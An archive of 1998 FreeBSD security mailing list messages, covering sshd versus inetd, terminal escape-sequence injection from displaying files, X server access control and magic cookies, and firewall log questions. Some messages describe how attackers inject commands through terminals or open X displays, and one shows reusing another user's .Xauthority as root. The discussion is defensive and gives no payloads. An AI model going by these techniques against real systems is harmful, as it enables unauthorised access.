From owner-freebsd-security Sun Sep 13 01:47:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03976 for freebsd-security-outgoing; Sun, 13 Sep 1998 01:47:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id BAA03971 for ; Sun, 13 Sep 1998 01:47:20 -0700 (PDT) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 20634 invoked by uid 1001); 13 Sep 1998 08:47:06 +0000 (GMT) To: marquis@roble.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Sat, 12 Sep 1998 19:59:58 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sun, 13 Sep 1998 10:47:06 +0200 Message-ID: <20632.905676426@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If you're running inetd then it doesn't seem consistent to start > daemons that don't need to run all the time from startup scripts. > Inetd was designed to conserve memory. If you have it why not use it? > /etc/inetd.conf is also a common place to implement access control (via > tcp_wrappers). But I *do* need sshd all the time :-) Starting it from inetd might make sense if this is a host you login to very rarely. > Other than that I've frequently run into situations where keepalives > had to be turned off. In those cases ssh sessions invariably die and > their daemons have to be killed-off by hand (kill ). As it is > difficult to tell the original daemon from the child daemons it's also > easy to accidentally kill the parent. Not really. "cat /var/run/sshd.pid" tells you the pid of the parent. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 02:37:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA07628 for freebsd-security-outgoing; Sun, 13 Sep 1998 02:37:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tim.xenologics.com (tim.xenologics.com [194.77.5.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA07621 for ; Sun, 13 Sep 1998 02:37:42 -0700 (PDT) (envelope-from seggers@semyam.dinoco.de) Received: (from uucp@localhost) by tim.xenologics.com (8.8.5/8.8.8) with UUCP id LAA01582; Sun, 13 Sep 1998 11:36:43 +0200 (MET DST) Received: from semyam.dinoco.de (semyam.dinoco.de [127.0.0.1]) by semyam.dinoco.de (8.9.1/8.8.8) with ESMTP id LAA02989; Sun, 13 Sep 1998 11:32:40 +0200 (CEST) (envelope-from seggers@semyam.dinoco.de) Message-Id: <199809130932.LAA02989@semyam.dinoco.de> To: andrew@squiz.co.nz cc: Jay Tribick , freebsd-security@FreeBSD.ORG, seggers@semyam.dinoco.de Subject: Re: Err.. cat exploit.. (!) In-reply-to: Your message of "Fri, 11 Sep 1998 07:39:59 +1200." Date: Sun, 13 Sep 1998 11:32:39 +0200 From: Stefan Eggers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > about xterm escape sequences and so forth, but scanning through the > man page for xterm, the 'string' action stands out as potentially highly > dangerous unless care has been taken to limit it's impact. As I understand it these actions are meant for use in X resources to bind keys to certain actions. So if one makes sure that the resources are only loaded with user specified ones (as Xsession - which is used by xdm - seems to do if one doesn't have an ~/.xsession) and the X server disallows all accesses to other users only oneself can have set these. Or do I misunderstand something here? Stefan. -- Stefan Eggers Lu4 yao2 zhi1 ma3 li4, Max-Slevogt-Str. 1 ri4 jiu3 jian4 ren2 xin1. 51109 Koeln Federal Republic of Germany To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 03:46:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA14961 for freebsd-security-outgoing; Sun, 13 Sep 1998 03:46:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hotmail.com (f35.hotmail.com [207.82.250.46]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id DAA14944 for ; Sun, 13 Sep 1998 03:44:56 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 16469 invoked by uid 0); 13 Sep 1998 10:44:29 -0000 Message-ID: <19980913104429.16468.qmail@hotmail.com> Received: from 208.218.169.84 by www.hotmail.com with HTTP; Sun, 13 Sep 1998 03:44:28 PDT X-Originating-IP: [208.218.169.84] From: "N. N.M" To: freebsd-security@FreeBSD.ORG Subject: A question probably relevant to IPFW Content-Type: text/plain Date: Sun, 13 Sep 1998 03:44:28 PDT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I was wondering if somebody could help me. I had a FreeBSD with IPFW active on it to filter some kinds of packets. It was rebooted automatically and frequently every 2 or 3 days at 2 am. I've removed IPFW from it and also set up another FreeBSD (with the same configuration) as the active filter. Now the new computer does the same: it's rebooted automacally and frequently every 2-3 days at 2 am. But the former computer hasn't been rebooted after removing IPFW from it and since the time it wasn't the active filter. Please let me know if anybody has any idea about it. Thanks. N.M ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 03:57:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA16461 for freebsd-security-outgoing; Sun, 13 Sep 1998 03:57:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA16452 for ; Sun, 13 Sep 1998 03:57:38 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id MAA15702; Sun, 13 Sep 1998 12:56:21 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199809131056.MAA15702@gratis.grondar.za> To: Stefan Eggers cc: andrew@squiz.co.nz, Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: Your message of " Sun, 13 Sep 1998 11:32:39 +0200." <199809130932.LAA02989@semyam.dinoco.de> References: <199809130932.LAA02989@semyam.dinoco.de> Date: Sun, 13 Sep 1998 12:56:16 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Stefan Eggers wrote: > As I understand it these actions are meant for use in X resources to > bind keys to certain actions. So if one makes sure that the resources > are only loaded with user specified ones (as Xsession - which is used > by xdm - seems to do if one doesn't have an ~/.xsession) and the X > server disallows all accesses to other users only oneself can have set > these. Or do I misunderstand something here? You misunderstand the terminal model. _MOST_ modern terminals have the ability to allow an escape-sequence to modify either the "report-back" string, any keystroke, or certain keystrokes to send a (attacker-chosen) string. Clever attackers have used this in the past to get the terminal to send hostile commands back to the host system. X server is not involved in the _general_ model, nor is the OS. Can we put this to sleep now? M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 05:37:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA27107 for freebsd-security-outgoing; Sun, 13 Sep 1998 05:37:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tim.xenologics.com (tim.xenologics.com [194.77.5.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA27101 for ; Sun, 13 Sep 1998 05:37:39 -0700 (PDT) (envelope-from seggers@semyam.dinoco.de) Received: (from uucp@localhost) by tim.xenologics.com (8.8.5/8.8.8) with UUCP id OAA16716; Sun, 13 Sep 1998 14:36:34 +0200 (MET DST) Received: from semyam.dinoco.de (semyam.dinoco.de [127.0.0.1]) by semyam.dinoco.de (8.9.1/8.8.8) with ESMTP id OAA12240; Sun, 13 Sep 1998 14:34:00 +0200 (CEST) (envelope-from seggers@semyam.dinoco.de) Message-Id: <199809131234.OAA12240@semyam.dinoco.de> To: Mark Murray Cc: freebsd-security@FreeBSD.ORG, seggers@semyam.dinoco.de Subject: Re: Err.. cat exploit.. (!) In-reply-to: Your message of "Sun, 13 Sep 1998 12:56:16 +0200." <199809131056.MAA15702@gratis.grondar.za> Date: Sun, 13 Sep 1998 14:33:58 +0200 From: Stefan Eggers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > As I understand it these actions are meant for use in X resources to > You misunderstand the terminal model. No, it was specifically about xterm's action string() as was visible by reading the text I quoted. My intention was to explain why this specific thing isn't harmful if used propperly, i.e. only oneself has access to the X server when logged in. > Can we put this to sleep now? For a generic terminal it was at sleep for me already as I know about the problem for at least a decade. I just didn't see anybody saying a word about xterm's action string() and as I know that these things can sometimes be hard to understand I just wanted to give some help for those trying. Stefan. -- Stefan Eggers Lu4 yao2 zhi1 ma3 li4, Max-Slevogt-Str. 1 ri4 jiu3 jian4 ren2 xin1. 51109 Koeln Federal Republic of Germany To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 06:06:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA00952 for freebsd-security-outgoing; Sun, 13 Sep 1998 06:06:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA00944 for ; Sun, 13 Sep 1998 06:06:50 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no) Received: from gjallarhorn.ifi.uio.no (2602@gjallarhorn.ifi.uio.no [129.240.65.40]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id PAA15929; Sun, 13 Sep 1998 15:06:35 +0200 (MET DST) Received: (from dag-erli@localhost) by gjallarhorn.ifi.uio.no ; Sun, 13 Sep 1998 15:06:34 +0200 (MET DST) Mime-Version: 1.0 To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Re: A question probably relevant to IPFW References: <19980913104429.16468.qmail@hotmail.com> Organization: University of Oslo, Department of Informatics X-url: http://www.stud.ifi.uio.no/~dag-erli/ X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list X-disclaimer-1: The views expressed in this article are mine alone, and do X-disclaimer-2: not necessarily coincide with those of any organisation or X-disclaimer-3: company with which I am or have been affiliated. X-Stop-Spam: http://www.cauce.org/ From: dag-erli@ifi.uio.no (Dag-Erling =?iso-8859-1?Q?Co=EFdan?= =?iso-8859-1?Q?Sm=F8rgrav?= ) Date: 13 Sep 1998 15:06:34 +0200 In-Reply-To: "N. N.M"'s message of "Sun, 13 Sep 1998 03:44:28 PDT" Message-ID: Lines: 19 X-Mailer: Gnus v5.5/Emacs 19.34 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id GAA00947 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "N. N.M" writes: > I was wondering if somebody could help me. I had a FreeBSD with IPFW > active on it to filter some kinds of packets. It was rebooted > automatically and frequently every 2 or 3 days at 2 am. I've removed > IPFW from it and also set up another FreeBSD (with the same > configuration) as the active filter. Now the new computer does the same: > it's rebooted automacally and frequently every 2-3 days at 2 am. But the > former computer hasn't been rebooted after removing IPFW from it and > since the time it wasn't the active filter. Sounds to me like something in /etc/daily crashes your box, since it always happens at 2 am. Anyway, this is not the right list, unless you suspect the reboots are caused by malicious tampering; you should post you question to freebsd-stable or freebsd-current, depending on which version you run. DES -- Dag-Erling Smørgrav - dag-erli@ifi.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 09:16:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA15781 for freebsd-security-outgoing; Sun, 13 Sep 1998 09:16:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA15772 for ; Sun, 13 Sep 1998 09:16:13 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id JAA05216; Sun, 13 Sep 1998 09:15:55 -0700 (PDT) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdlX5211; Sun Sep 13 09:15:18 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id JAA03746; Sun, 13 Sep 1998 09:15:02 -0700 (PDT) Message-Id: <199809131615.JAA03746@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdNc3732; Sun Sep 13 09:14:57 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: Karl Denninger cc: Garrett Wollman , Josef Karthauser , Jay Tribick , freebsd-security@FreeBSD.ORG, cschuber@uumail.gov.bc.ca Subject: X Security (was: Re: Err.. cat exploit.. (!)) In-reply-to: Your message of "Thu, 10 Sep 1998 13:36:15 CDT." <19980910133615.A13227@Mcs.Net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 13 Sep 1998 09:14:53 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote: > > < s aid: > > > > >> That's why you should normally use `more' or `less'. > > > > > Ok, but how come the interactions we describe? > > > > Most terminals, including the VT102 emulated by `xterm', include some > > mechanism for generating an ``answerback'' upon receipt of a special > > control code or sequence. (In xterm's case, that happens to be a > > control-E.) A binary file is likely enough to contain such a code. > > > > There's might be a preference you can set which will disable this > > feature in xterm, but I don't know what it might be (and if there is > > one, it's not documented). > > > > -GAWollman > > Actually, for VTxxx series terminals (and good emulators of them) as well as > most others, the problem is far worse. > > Most terminals can be made to display something, set the cursor to where the > "something" is, and then *send the line containing the something to the > host*. > > This allows ARBITRARY commands to be accidentially (read: maliciously) > executed by someone doing nothing more than displaying a file! > > This is an OLD trick, but one which still works, and if the person doing the > tricking is crafty it can be particularly dangerous. (Consider that most > termainls also have attributes such as "invisible" text available, and/or > that you can send the line, then back up again and overwrite it). > > I can craft a 40-50 byte sequence that will, if the file is "catted" as > root, give me an instant SUID root shell somewhere on the system that > you're very unlikely to find. > > Indiscriminately displaying files without terminal control enforced (ie: by > a pager) is EXTREMELY dangerous, especially if you're running with > privileges (ie: as root). That is why doing an xhost + or even and xhost hostname even to hosts that you think you trust is so dangerous. It is easy for someone to inject some "keystrokes" into an Xterm to get a root shell on a host that one is logged into. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 10:17:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA21338 for freebsd-security-outgoing; Sun, 13 Sep 1998 10:17:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA21333 for ; Sun, 13 Sep 1998 10:17:17 -0700 (PDT) (envelope-from myke@ees.com) Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with ESMTP id NAA27678; Sun, 13 Sep 1998 13:16:44 -0400 (EDT) (envelope-from myke@ees.com) Date: Sun, 13 Sep 1998 13:16:43 -0400 (EDT) From: Mike Holling X-Sender: myke@phluffy.lm.com To: sthaug@nethelp.no cc: marquis@roble.com, freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <20632.905676426@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > If you're running inetd then it doesn't seem consistent to start > > daemons that don't need to run all the time from startup scripts. > > Inetd was designed to conserve memory. If you have it why not use it? > > /etc/inetd.conf is also a common place to implement access control (via > > tcp_wrappers). Inetd runs many things, and on some of the (older) machines here inetd occasionally dies. It's very nice to have ssh run standalone so you can still get into the machine remotely and restart inetd. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 14:20:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04141 for freebsd-security-outgoing; Sun, 13 Sep 1998 14:20:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04135 for ; Sun, 13 Sep 1998 14:20:17 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id QAA15620; Sun, 13 Sep 1998 16:19:55 -0500 (CDT) Date: Sun, 13 Sep 1998 16:19:55 -0500 (CDT) From: Igor Roshchin Message-Id: <199809132119.QAA15620@alecto.physics.uiuc.edu> To: security@FreeBSD.ORG Subject: X-security Cc: cschuber@uumail.gov.bc.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > That is why doing an xhost + or even and xhost hostname even to hosts > that you think you trust is so dangerous. It is easy for someone to > inject some "keystrokes" into an Xterm to get a root shell on a host > that one is logged into. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Open Systems Group Internet: cschuber@uumail.gov.bc.ca > ITSD Cy.Schubert@gems8.gov.bc.ca > Government of BC > May be I am wrong, but xterm (when correctly configured, e.g.: no emulation enabled) will not allow to do that. am I blindly wrong ? The much higher danger in having xhost set to allow outside, or even inside connections - possibility of "steeling" your keystrokes. AFAIK, XFree86 does allow to disable access to your DISPLAY even from the localhost by other users (E.g. on SGIs one can always run any program with DISPLAY set local to localhost:0, and you can not disable that). Regards, IgoR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 18:52:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA07062 for freebsd-security-outgoing; Sun, 13 Sep 1998 18:52:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA07055; Sun, 13 Sep 1998 18:52:31 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id VAA28566; Sun, 13 Sep 1998 21:52:10 -0400 (EDT) Date: Sun, 13 Sep 1998 21:52:10 -0400 (EDT) Message-Id: <199809140152.VAA28566@trooper.velocet.ca> From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: John Fieber Cc: Roger Marquis , freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-Reply-To: References: X-Mailer: VM 6.34 under Emacs 20.2.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "John" == John Fieber writes: John> [topic drift from security to ports; CC: added] On Sat, 12 Sep John> 1998, Roger Marquis wrote: John> A more frustrating problem for me are ports that are not John> ${PREFIX} != /usr/local compatible which makes it a hassle to John> install multiple version of a port or separate ports that have John> common files. Also, I occasionaly go through phases of liking John> SysV way of installing things in /opt/, John> /etc/opt/ and /var/opt/ which a simple 'make John> PREFIX=/opt/' doesn't really accomplish. The NetBSD ports collection seems happy to consistently use /usr/pkg as its root. I'm certainly not positive that this can easily be made a changeable option without some difficulty, but one of the often heard complaints in our shop is that we can't really use /usr/local for local things anymore because ports live there --- and we desire the ability to blow away easily recreated ports while retaining hand built extras. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 20:08:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA14016 for freebsd-security-outgoing; Sun, 13 Sep 1998 20:08:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from obie.softweyr.com ([204.68.178.33]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA14008 for ; Sun, 13 Sep 1998 20:08:22 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (wes@zaphod.softweyr.com [204.68.178.35]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id VAA14791; Sun, 13 Sep 1998 21:07:59 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <35FC888F.89EF324C@softweyr.com> Date: Sun, 13 Sep 1998 21:07:59 -0600 From: Wes Peters Organization: Softweyr llc X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.6-RELEASE i386) MIME-Version: 1.0 To: Igor Roshchin CC: security@FreeBSD.ORG Subject: Re: X-security References: <199809132119.QAA15620@alecto.physics.uiuc.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Igor Roshchin wrote: > > AFAIK, XFree86 does allow to disable access to your DISPLAY > even from the localhost by other users > (E.g. on SGIs one can always run any program with DISPLAY set local to > localhost:0, and you can not disable that). You're right. By default, XFree86 uses "MIT MAGIC COOKIE" authen- tication; when the server starts it creates a .Xauthority file in your home directory. Anyone who can read this file will still be able to connect to your X server -- the root account on your machine, for instance. Try it on your system: login as root and try xdpyinfo; it will fail saying # export DISPLAY=:0 # xdypinfo Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server xdpyinfo: unable to open display ":0". Now try it again, specifying YOUR Xauthority file: # export XAUTHORITY=~wes/.Xauthority # xdpyinfo name of display: :0.0 version number: 11.0 vendor string: The XFree86 Project, Inc vendor release number: 3320 maximum request size: 4194300 bytes ... I use this at work, where I am typically logged onto one or more large server machines from my workstation. My .profile on the server machines copies over my current .Xauthority file whenever I login, allowing me access to the workstation display. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 20:57:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA17704 for freebsd-security-outgoing; Sun, 13 Sep 1998 20:57:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-28.igrin.co.nz [202.49.245.107]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA17698 for ; Sun, 13 Sep 1998 20:57:48 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id PAA01640 for ; Mon, 14 Sep 1998 15:57:30 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Mon, 14 Sep 1998 15:57:29 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: security@FreeBSD.ORG Subject: odd icmp packet Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I monitor odd packets on broadcast channels, and this turned up in my logs: Sep 14 14:57:55 dawn /kernel: ipfw: 60100 Accept ICMP:11.0 xxx.xx.xx.xx 255.255.255.255 in via de0 xxx.xx.xx.xx is not on my subnet, but the machine which recorded this is not behind a firewall except in so far as it runs its own filters ICMP:11.0 indicates time exceeded in transit. Can someone explain what might have caused this. Am I correct in thinking that because ICMP packets do not generate responses this does not have DoS relevance? Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 21:50:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA23302 for freebsd-security-outgoing; Sun, 13 Sep 1998 21:50:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA23295 for ; Sun, 13 Sep 1998 21:50:04 -0700 (PDT) (envelope-from peter.jeremy@auss2.alcatel.com.au) Received: by border.alcanet.com.au id <40329>; Mon, 14 Sep 1998 14:49:16 +1000 Date: Mon, 14 Sep 1998 14:49:35 +1000 From: Peter Jeremy Subject: Re: X-security To: freebsd-security@FreeBSD.ORG Message-Id: <98Sep14.144916est.40329@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > By default, XFree86 uses "MIT MAGIC COOKIE" authen- >tication; when the server starts it creates a .Xauthority file in >your home directory. Anyone who can read this file will still be >able to connect to your X server Note that the authentication tokens are not encrypted on the network. Anyone who can sniff the network will also be able to connect to your X-server. If you're worried about someone stealing your authentication token, you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**) or ssh. > # export XAUTHORITY=~wes/.Xauthority > # xdpyinfo I find this very useful for running X-sessions after I su. (*) XDM-AUTHORIZATION-1 uses DES and is not compiled into the standard version of XFree. Suitable versions of WrapHelp.c are available from outside the US for people wanting to use it. (**) I don't believe this is supported by anyone except Sun. Peter -- Peter Jeremy (VK2PJ) peter.jeremy@alcatel.com.au Alcatel Australia Limited 41 Mandible St Phone: +61 2 9690 5019 ALEXANDRIA NSW 2015 Fax: +61 2 9690 5247 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 22:23:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA29262 for freebsd-security-outgoing; Sun, 13 Sep 1998 22:23:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA29254 for ; Sun, 13 Sep 1998 22:23:44 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id AAA00635; Mon, 14 Sep 1998 00:23:25 -0500 (CDT) Received: from harkol-104.isdn.mke.execpc.com(169.207.64.232) by peak.mountin.net via smap (V1.3) id sma000633; Mon Sep 14 00:23:18 1998 Message-Id: <3.0.3.32.19980914002155.0078fb78@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Mon, 14 Sep 1998 00:21:55 -0500 To: Roger Marquis , freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: sshd In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:59 PM 9/12/98 -0700, Roger Marquis wrote: >If you're running inetd then it doesn't seem consistent to start >daemons that don't need to run all the time from startup scripts. >Inetd was designed to conserve memory. If you have it why not use it? >/etc/inetd.conf is also a common place to implement access control (via >tcp_wrappers). The parent only takes up about 600K or so. As someone mentioned, keeping ssh out of inetd give you a backup access method, which would be telnet w/SKEY. >Other than that I've frequently run into situations where keepalives >had to be turned off. In those cases ssh sessions invariably die and >their daemons have to be killed-off by hand (kill ). As it is >difficult to tell the original daemon from the child daemons it's also >easy to accidentally kill the parent. If ssh is the only access you're >locked-out. Easier and more consistent to use inetd where it's >available, IMHO and YMMV. Rarely have I seen hung sessions, even after being rudely disconnected by the IPS(s) I connect into. Even then what's so diffifcult about killing the child? # ps -ax -o uid,pid,ppid,state,tt,start,time,command | grep ssh UID PID PPID STAT TT STARTED TIME COMMAND 0 149 1 Is ?? Fri06AM 0:05.52 /usr/local/sbin/sshd (sshd1) 0 28319 149 S ?? 10:35PM 0:09.78 /usr/local/sbin/sshd (sshd1) Only one session leader here and killing the parent would be bad form. 8-) FWIW, you can -HUP the parent while on an active ssh session and not be disconnected. If you use -HUP the worst that you could do is disconnect someone. Jeff Mountin - Unix 